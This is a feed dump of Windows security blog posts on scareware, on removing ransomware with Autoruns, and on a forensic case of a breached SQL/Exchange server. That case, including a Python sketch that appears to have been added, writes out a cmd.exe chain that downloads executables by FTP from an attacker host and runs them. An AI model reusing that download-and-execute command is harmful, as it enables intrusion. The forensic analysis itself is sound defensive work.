Windows Blog Archive articles https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/bg-p/Windows-Blog-Archive Windows Blog Archive articles Mon, 25 Oct 2021 14:03:48 GMT Windows-Blog-Archive 2021-10-25T14:03:48Z The Case of the Father-in-Law’s Scareware https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-father-in-law-8217-s-scareware/ba-p/724376 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 18, 2015 </STRONG> <BR /> <P> We all know people, friends and family, that have fallen for the “your system is infected, press here to get protected” scams that are becoming even more common since I first wrote about them in my The Antispyware Conspiracy blog post in 2005. </P> <P> <IMG alt="image" border="0" height="373" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2437.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121446i45AEFF8571967D89" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="554" /> </P> <P> </P> <P> <IMG alt="image" border="0" height="403" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8787.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121447i83C3EAE93A05E205" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="554" /> </P> <P> </P> <P> </P> <P> <IMG alt="image" border="0" height="226" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0361.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121448i241550AA980B62F2" style="border-bottom: 0px; border-left: 0px; display: inline; 
border-top: 0px; border-right: 0px" title="image" width="554" /> </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 07:31:15 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-father-in-law-8217-s-scareware/ba-p/724376 MarkRussinovich 2019-06-27T07:31:15Z Hunting Down and Killing Ransomware https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/hunting-down-and-killing-ransomware/ba-p/724372 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 02, 2013 </STRONG> <BR /> <P> Scareware, a type of malware that mimics antimalware software, has been around for a decade and shows no sign of going away. The goal of scareware is to fool a user into thinking that their computer is heavily infected with malware and the most convenient way to clean the system is to pay for the full version of the scareware software that graciously brought the infection to their attention. I wrote about it back in 2006 in my <A href="#" target="_blank"> The Antispyware Conspiracy </A> blog post, and the fake antimalware of today doesn’t look much different than it did back then, often delivered as kits that franchisees can skin with their own logos and themes. There’s even one labeled Sysinternals Antivirus: </P> <P> <IMG alt="image" border="0" height="345" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7776.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121433i77D9008F9BFE2B20" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> A change that’s been occurring in the scareware industry over the last few years is that most scareware today also classifies as ransomware. The examples in my 2006 blog post merely nagged you that your system was infected, but otherwise let you continue to use the computer. 
Today’s scareware prevents you from running security and diagnostic software at a minimum, and often prevents you from executing any software at all. Without advanced malware cleaning skills, a system infected with ransomware is usable only to give in to the blackmailer’s demands to pay. </P> <P> In this blog post I describe how different variants of ransomware lock the user out of their computer, how they persist across reboots, and how you can use <A href="#" target="_blank"> Sysinternals Autoruns </A> to hunt down and kill most current ransomware variants from an infected system. </P> <H3> The Prey </H3> <P> Before you can hunt effectively, you must first understand your prey. Fake-antimalware-type scareware, by far the most common type of ransomware, usually aims at being constantly annoying rather than completely locking a user out of their system. The prevalent strains use built-in lists of executables to determine what they will block, which usually includes most antimalware and even the primary Sysinternals tools. They customarily let the user run most built-in software like Paint, but sometimes will block some of those. When they block an executable they display a dialog falsely claiming that it was blocked because of an infection: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5381.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121434i15574C0F92F71854" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> But malware has gotten even more aggressive in the last couple of years, not even pretending to be anything other than the ransomware that it is. 
Take this example, which completely takes over a computer, blocking all access to anything except its own window, and demands an unlock code to regain the use of the system that the user must purchase by calling the number specified (in this case one with a Russian country code) : </P> <P> <IMG alt="image" border="0" height="297" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3666.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121435i13225AF8A34D5DC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Here’s one that similarly takes over the computer, but forces the user to do some online shopping to redeem the computer’s use (I haven’t investigated to see what amount of purchasing returns the use of the computer): </P> <P> <IMG alt="image" border="0" height="323" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7853.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121436i1C91DA139599B65F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> And here’s one that I suppose can also be called scareware, because it informs the user that their system harbors child pornography, something that would be horrifying news to most people. The distributor must believe that the fear of having to defend against charges of child pornography will dissuade victims from going to the authorities and convince them to instead pay the requested fee. 
</P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7357.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121437i352451993875B421" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Some ransomware goes so far as to present itself as official government software. Here’s one supposedly from the French police that informs users that pirated movies reside on their computer and they must pay a fine as punishment: </P> <P> <IMG alt="image" border="0" height="423" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3666.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121438i1B9EF2A60D91EAD2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> As far as how these malefactors lock users out of their computer, there are many different techniques in practice. One commonly used by the fake-antimalware variety, like the Security Shield malware shown in an earlier screenshot, is to block the execution of other programs by simply watching for the appearance of new windows and forcibly terminating the owning process. Another technique, used by the online shopping ransomware example pictured above, is to hide any windows not belonging to the malware, thus technically enabling you to launch other software but not to interact with it. A similar approach is for malware to create a full-screen window and to constantly raise the window to the top of the window order, obscuring all other application windows behind it. 
I’ve also seen more devious tricks, like one sample that creates a new desktop and switches to it, similar to the way <A href="#" target="_blank"> Sysinternals Desktops </A> works – but while your programs are still running, you can’t switch to their desktop to interact with them. </P> <H3> Finding a Position from Which to Hunt </H3> <P> The first step for cleaning a system of the tenacious grip of ransomware is to find a place from which to perform the cleaning. All of the lock-out techniques make it impossible to interact with a system from the infected account, which is typically its primary administrative account. If the victim system has another administrative account and the malware hasn’t hijacked a global autostart location that infects all accounts, then you’ve gotten lucky and can clean from there. </P> <P> Unfortunately, most systems only have one administrative account, removing the alternate account option. The fallback is to try <A href="#" target="_blank"> <EM> Safe Mode </EM> </A> , which you can reach by pressing F8 during the boot process (reaching <EM> Safe Mode </EM> is a little more difficult <A href="#" target="_blank"> in Windows 8 </A> ). Most ransomware configures itself to automatically start by creating an entry in the Run or RunOnce key of HKCU\Software\Microsoft\Windows\CurrentVersion (or the HKLM variants), which Safe Mode doesn’t process, so Safe Mode can provide an effective platform from which to clean such malware. A growing number of ransomware samples modify HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell (or the HKLM location), however, which both <EM> Safe Mode </EM> and <EM> Safe Mode with Networking </EM> execute. 
<EM> Safe Mode with Command Prompt </EM> overrides the registry shell selection, so it circumvents the startup of the majority of today’s ransomware and is the next fallback position: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4721.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121439i18986531D2B4CD0C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Finally, if the malware is active even in <EM> Safe Mode with Command Prompt </EM> , you’ll have no choice but to go offline hunting in an alternate Windows installation. There are a number of options available. If you have Windows 8, creating a <A href="#" target="_blank"> Windows 8 To Go </A> installation is ideal, since it is literally a full version of Windows. An alternative is to boot the Windows Setup media and type Shift+F10 to open a command-prompt when you reach the first graphical screen: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4214.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121440i74429597082F9879" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> You won’t have access to Internet Explorer and many applications won’t work properly in Windows Setup’s stripped-down environment, but you can run many of the Sysinternals tools. 
Finally, you can create a <A href="#" target="_blank"> Windows Preinstallation Environment </A> (WinPE) boot media, which is an environment similar to that of Windows Setup and something that <A href="#" target="_blank"> Microsoft Diagnostics and Recovery Toolset </A> (MSDaRT) uses. </P> <H3> The Hunt </H3> <P> Now that you’ve found your hunting spot, it’s time to select your weapon. The easiest to use is of course off-the-shelf antimalware software. If you’re logged in to an alternate account or <EM> Safe Mode </EM> you can use standard online-scanning products, many of which are free, like Microsoft’s own <A href="#" target="_blank"> Windows Defender </A> . If you’re booted into a different Windows installation, however, then you’ll need to use an offline scanner, like <A href="#" target="_blank"> Windows Defender Offline </A> . If the antimalware engine isn’t able to detect or clean the infection, you’ll have to turn to a more precise, manual weapon. </P> <P> One utility that enables you to rip the malware’s tendrils off the system is <A href="#" target="_blank"> Sysinternals Autoruns </A> . Autoruns is aware of over a hundred places where malware can configure itself to automatically start when Windows boots, a user logs in, or a specific built-in application launches. The way you need to run it depends on what environment you’re hunting from, but in all cases you should run it with administrative rights. 
Also, Autoruns automatically starts scanning when you start it; you should abort the initial scan by pressing the Esc key, then open the Filter dialog and select the options to verify signatures and to hide all Microsoft entries so that malware will appear more prominently, and restart the scan: </P> <P> <IMG alt="image" border="0" height="186" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8422.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121441i349C44D7E7474BB3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="305" /> </P> <P> If you’re logged into a different account from the one that’s infected, then you need to point Autoruns at the infected account by selecting it from the User menu. In this example Autoruns is running in the Fred account, but the one that’s infected is Abby, so I’ve selected the Abby profile: </P> <P> <IMG alt="image" border="0" height="172" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3644.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121442i3BCFA6D31D4F8FAC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="306" /> </P> <P> If you’ve booted into a different operating system then you need to use Autoruns offline support, which requires you to specify the root of the target Windows installation and the target user profile. 
Open the Analyze Offline System dialog from the File menu and enter the appropriate directories: </P> <P> <IMG alt="image" border="0" height="241" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3124.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121443iAEF57FA9A265380F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="370" /> </P> <P> After Autoruns has scanned the system, you have to spot the malware. As I explain in my <A href="#" target="_blank"> Malware Hunting with the Sysinternals Tools </A> presentations, malware often exhibits the following characteristics: </P> <P> <IMG alt="image" border="0" height="323" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7853.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121444i86F58D5F007B22C2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Of course, since Autoruns just shows autostart configuration and not running processes, some of these attributes are not relevant. Nevertheless, I’ve found in my examination of several dozen variants of current ransomware that all of them satisfy more than one, most commonly by not having a description or company name and having a random or suspicious file name. </P> <P> One downside to offline scanning is that signature verification doesn’t work properly. This is because Windows uses catalog signing, as opposed to direct image signing, where it stores signatures in separate files rather than in the images themselves. 
Autoruns doesn’t process offline catalog files (I’ll probably add that support in the near future), so all catalog-signed images will show up as unverified and highlighted in red. Since most malware doesn’t pretend to be from Microsoft, you can try an initial scan with the option to verify code signatures unchecked. Here’s the result of an offline scan with signature verification disabled of a ransomware infection that takes over two autostart locations - see if you can spot them: </P> <P> <IMG alt="image" border="0" height="254" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7455.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121445i2C24230C86A3BD7B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> If you are unsure about an image, you can try uploading it to Virustotal.com for analysis by around 40 of the most popular antivirus engines, searching the Web for information, and looking at the strings embedded in the file using the <A href="#" target="_blank"> Sysinternals Strings </A> utility. </P> <H3> The Kill </H3> <P> Once you’ve determined which entries belong to malware, the next step is to disable them by deselecting the checkboxes of their autostart entries. This will allow you to re-enable the entries later if you discover you made a mistake. It doesn’t hurt to also move the malware files and any other suspicious files in the directory of the ones configured to autostart to another directory. Moving all the files makes it more likely that you’ll break the malware even if you miss an autostart location. </P> <P> Next, check to see if your prey is dead by booting the system and logging into the account that was infected. 
If you still see signs of an infection, you might have missed something in your Autoruns analysis, so repeat the steps. If that doesn’t yield success, the malware may be a more sophisticated strain, for example one that infects the Master Boot Record or that infects the system in some other unconventional way to persist across reboots. There is also ransomware that goes further and encrypts files, but they are relatively rare. Fortunately, ransomware authors are lazy and generally don’t need to go to such extents to be effective, so a quick analysis with Autoruns is virtually always lethal. </P> <P> Happy hunting! </P> <P> <EM> If you liked this post, you’ll like my two highly-acclaimed cyberthriller novels, Zero Day and Trojan Horse. Watch their exciting video trailers, read sample chapters and find ordering information on my personal site at </EM> <A href="#" target="_blank"> <EM> http://russinovich.com </EM> </A> </P> </BODY></HTML> Thu, 27 Jun 2019 07:30:48 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/hunting-down-and-killing-ransomware/ba-p/724372 MarkRussinovich 2019-06-27T07:30:48Z The Case of the Unexplained FTP Connections https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexplained-ftp-connections/ba-p/724355 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 28, 2012 </STRONG> <BR /> <P> A key part of any cybersecurity plan is “continuous monitoring”, or enabling auditing and monitoring throughout a network environment and configuring automated analysis of the resulting logs to identify anomalous behaviors that merit investigation. This is part of the new “assumed breach” mentality that recognizes no system is 100% secure. Unfortunately, the company at the heart of this case didn’t have a comprehensive monitoring system, so had been breached for some time before updated antimalware signatures cleaned their infection and brought the breach to their attention. 
Besides highlighting just how weak cybersecurity is at many companies, this case highlights the use of several <A href="#" target="_blank"> Sysinternals Process Monitor </A> features, including the Process Tree dialog and one feature many people aren’t aware of, Process Monitor’s ability to monitor network activity. </P> <P> The case opened when a network administrator at a South African company contacted Microsoft Services Premier Support and reported that their corporate Exchange server, running on Windows Server 2008 R2, appeared to be making outbound FTP connections. They noticed this only because the company’s installation of Microsoft Forefront Endpoint Protection (FEP) alerted them that it had cleaned a piece of malware it found on the server. Concerned that their network might still be compromised despite the fact that FEP claimed the system was malware-free, he examined the company’s perimeter firewall logs. To his horror, he discovered FTP connections that numbered in the hundreds per day and dated back several weeks. Instead of attempting a forensic examination on his own, he called on Microsoft’s security consulting team, which specializes in helping customers clean up after an attack. </P> <P> The Microsoft support engineer assigned to the case began by capturing a five-minute Process Monitor trace of the Exchange server. After stopping the trace he opened the Process Tree dialog (under the Tools menu), which shows the parent-child relationships of all the processes that existed at any point in the current trace. 
He quickly found that around 20 FTP processes had been launched during the collection, each of them short-lived, except for one, which was still active (process 7324 below): </P> <P> <IMG alt="image" border="0" height="291" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4118.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121420i1AF99FFEC80FB95C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="436" /> </P> <P> The engineer looked at the command lines for the FTP processes by selecting them in the tree so that their details appeared at the bottom of the Process Tree dialog. The command lines for half of them bizarrely included just the “-?” argument, which simply brings up FTP help: </P> <P> <IMG alt="image" border="0" height="107" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4405.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121421i1990B3F285071005" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="234" /> </P> <P> The other half were more interesting, including “-i” and “-s” switches: </P> <P> <IMG alt="image" border="0" height="93" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6560.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121422i252ABD4CF8A5EAD7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="241" /> </P> <P> The –i switch has FTP turn off prompting for multiple file transfers, 
and –s directs FTP to execute the FTP commands listed in a file, in this case a file named “j”. Setting out to find out what file “j” contained, he clicked on the “Include Process” button at the bottom of the Process Tree dialog so that he could find the process’s file events: </P> <P> <IMG alt="image" border="0" height="40" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4186.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121423i1774616006629674" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="325" /> </P> <P> He searched the resulting filtered trace for “j” and found the file’s location in several of the events: </P> <P> <IMG alt="image" border="0" height="85" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5460.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121424i15E2549820E46FC4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="461" /> </P> <P> He navigated to the C:\Windows\System32\i4333 directory, but the “j” file was gone. That being a dead end, he turned his attention to the FTP process’s parent, Cmd.exe, and looked at its command line. 
The line was too long and convoluted to easily understand: </P> <P> <IMG alt="image" border="0" height="65" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1738.image_5F00_thumb_5F00_31F8EA0B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121425iBDD2DD402AED8DA1" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> He selected it, typed Ctrl+C to copy it to the clipboard, pasted it into Notepad, and decomposed it into its constituent components, each of which was separated by a “&amp;”. The result looked like this: </P> <P> <IMG alt="SNAGHTML143cd3bc" border="0" height="225" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8780.SNAGHTML143cd3bc_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121426iA0AA0C104F013EE7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML143cd3bc" width="454" /> </P> <P> The first instruction has the command prompt create a directory named i4333 and then start creating the contents of the “j” file. The commands it writes into “j” instruct FTP to connect to NUXZb.in.into4.info, log in with the user name “New” and the password “123”, then download all the files on the FTP server that end with “.exe”. After FTP has processed the file, the command prompt deletes “j” and then creates a batch file that executes the downloaded files, first using the Shell to launch them (“start”) and then the Command Prompt. </P> <P> A quick detour to Whois showed the engineer that the NUXZb hostname was issued by Protected Name Services and didn’t reveal any useful information. 
The engineer toggled off Process Monitor’s network name resolution and found the outbound FTP connection in the trace to see the IP address the name had resolved to: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2843.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121427iC8E98220F95B1871" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="513" /> </P> <P> An IP address location lookup on the Web pinpointed the IP address at an ISP in Chicago (the name now resolves to a different IP address), so he concluded the connection was to a server that was also compromised or one the attacker had hosted at the ISP. Finished analyzing the command line, he looked at the contents of the resulting script, D.bat, which was still in the directory and contained this single command: </P> <P> <IMG alt="image" border="0" height="35" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3326.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121428i531801D456DEE1FA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="324" /> </P> <P> Not coincidentally, 134.exe was the executable Forefront had flagged as a remote access Trojan (RAT) in the alerts that the administrator first responded to. The script could therefore not find it, making it seem that the attack – or at least this part of it - had been neutralized by FEP. It also implied that the attack was automated and stuck in a loop trying to activate. 
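</P> <P> To illustrate the decomposition step described earlier, here is a minimal Python sketch that splits a cmd.exe command line on unquoted “&amp;” separators, which is what the engineer did by hand in Notepad. The sample command line is a hypothetical, simplified reconstruction based only on the description in this post (the real one appears only in the screenshot), and the function and variable names are illustrative. The sketch ignores cmd.exe’s caret escaping and treats “&amp;&amp;” like a plain separator. </P>
<PRE>
```python
# Hypothetical, simplified command line modelled on the post's description.
# It is NOT the actual command line captured in the trace.
SAMPLE_COMMAND = (
    "md i4333 & cd i4333 & echo open NUXZb.in.into4.info > j & "
    "echo New >> j & echo 123 >> j & echo mget *.exe >> j & "
    "ftp -i -s:j & del j"
)


def split_cmd_line(command_line):
    """Split a cmd.exe command line into its '&'-separated components.

    Separators inside double quotes are kept as literal text.
    Caret (^) escaping is not handled in this sketch.
    """
    parts = []
    current = []
    in_quotes = False
    for ch in command_line:
        if ch == '"':
            # Toggle quoted state; keep the quote in the output.
            in_quotes = not in_quotes
            current.append(ch)
        elif ch == "&" and not in_quotes:
            # End of one component; skip empty pieces (e.g. from "&&").
            piece = "".join(current).strip()
            if piece:
                parts.append(piece)
            current = []
        else:
            current.append(ch)
    piece = "".join(current).strip()
    if piece:
        parts.append(piece)
    return parts


if __name__ == "__main__":
    for number, part in enumerate(split_cmd_line(SAMPLE_COMMAND), start=1):
        print(number, part)
```
</PRE>
<P> Run against the sample, the sketch prints eight numbered steps, from creating the i4333 directory to deleting “j”, which is far easier to follow than a single long line. 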
</P> <P> The engineer next set out to determine how the command-prompt processes were being launched. Looking at their parent processes in the process tree, he learned they were all launched from Sqlserver.exe: </P> <P> <IMG alt="image" border="0" height="146" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4503.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121429iEF16E20A9AF2259F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> This obviously wasn’t a good sign, but it wasn’t the worst of it: examining SQL Server’s network activity in the trace, he saw many incoming connections: </P> <P> <IMG alt="image" border="0" height="327" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1263.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121430i808D0535DFE6A09F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Lookups of the IP address locations placed them in China, Tunisia, Taiwan, and Morocco: </P> <P> <IMG alt="image" border="0" height="366" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8765.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121431iCCA68B480471A736" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The SQL Server was being used by an attacker or multiple attackers from around the world in countries known for being cybercriminal 
safe havens. It was clearly time to flatten the server, but before calling the administrator to give him the bad news and advise him to immediately disconnect the server from the network, he thought he’d spend a few minutes examining the security of the SQL Server. Understanding what had led to the compromise could help the company avoid being compromised the same way again. </P> <P> He launched a Microsoft support batch file that checks various SQL Server security settings. The tool ran for a few seconds and then printed its discouraging results: the server had an administrator account with a blank password, was configured for mixed-mode authentication, and allowed stored procedures to launch command prompts because the “xp_cmdshell” feature was enabled: </P> <P> <IMG alt="image" border="0" height="265" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4478.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121432i99DE4CD63B4C805F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> That meant that anyone on the Internet could log on to the server without a password and run executables – like FTP – to infect the system with their own tools. </P> <P> With the help of Process Monitor and some discussion with the company’s administrator, the support engineer had a solid theory for what had happened: an administrator at the company had installed SQL Server on the company’s Exchange server several weeks prior to the incident. Not realizing the server was on the perimeter, they had opened the SQL Server’s port in the local firewall, left the admin account with a blank password, and enabled xp_cmdshell. It goes without saying that even if the server wasn’t on the Internet, that configuration leaves a server without any network security. 
Not long after, automated malware scanning the Internet for exposed targets had stumbled across the open SQL port, infected the server with malware, and likely enlisted it in a botnet. FEP signatures for the new malware variant were delivered to the server some time later and removed the infection. The botnet-enlisting malware was still trying to reintegrate the server when the case with Microsoft support was opened. While the company can’t know how much – if any – of its corporate data was pilfered during the infection, this was a very loud and clear wake-up call. </P> <P> You can test your own cybersecurity knowledge by taking my <A href="#" target="_blank"> Operation Desolation cybersecurity quiz </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:29:14 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexplained-ftp-connections/ba-p/724355 MarkRussinovich 2019-06-27T07:29:14Z Windows Azure Host Updates: Why, When, and How https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-azure-host-updates-why-when-and-how/ba-p/724308 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 22, 2012 </STRONG> <BR /> <P> </P> <P> Windows Azure’s compute platform, which includes Web Roles, Worker Roles, and Virtual Machines, is based on machine virtualization. It’s the deep access to the underlying operating system that makes Windows Azure’s Platform-as-a-Service (PaaS) uniquely compatible with many existing software components, runtimes and languages, and of course, without that deep access – including the ability to bring your own operating system images – Windows Azure’s Virtual Machines couldn’t be classified as Infrastructure-as-a-Service (IaaS). </P> <H3> The Host OS and Host Agent </H3> <P> Machine virtualization of course means that your code, whether it’s deployed in a PaaS Worker Role or an IaaS Virtual Machine, executes in a Windows Server Hyper-V virtual machine. 
